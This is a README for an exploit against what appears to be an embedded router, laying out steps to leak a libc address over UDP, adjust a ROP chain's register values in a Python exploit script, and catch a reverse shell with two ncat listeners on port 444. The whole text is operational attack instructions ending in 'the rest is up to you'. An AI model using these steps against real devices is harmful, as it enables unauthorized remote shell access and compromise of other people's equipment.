minkione/rev1900/README.md

 so ... what has to be done :

     1>  run udp.py , and grab the offset of libc from serial console .
     2>  adapt ext789vacv2.py  ( ra , s0 , s4 , s2  registers )  ( libc: 0x2ae50000  , ra = hex(0x2ae50000+0x60330) , and so on .... )
     3>  (listner.sh) ncat -vv -l 444 --keep-open -c 'cat exit' &  ncat -v -l 444 --keep-open
     4>  adjust UDP_IP = "10.0.0.138" on ext789vacv2.py and make sure you are in 10.0.0.1 ( all of them listen on 10.0.0.138 , so this should not be a problem )   and sock.setsockopt(socket.SOL_SOCKET, 25, 'eth1') <---- eth1 interface ( choose yours , not relevant to shellcode payloads ... )
     5> run python ext789vacv2.py
     6> you should see some activity on the first ncat ( this is good ) 7> you should see some activity on the second ncat , at this point you have a reverse shell on this console, just type ls and the look for youtself
     8> the rest is up to you .

  be wise , be responsible.

- Cheers
+ Cheers,

  keep on rolling :)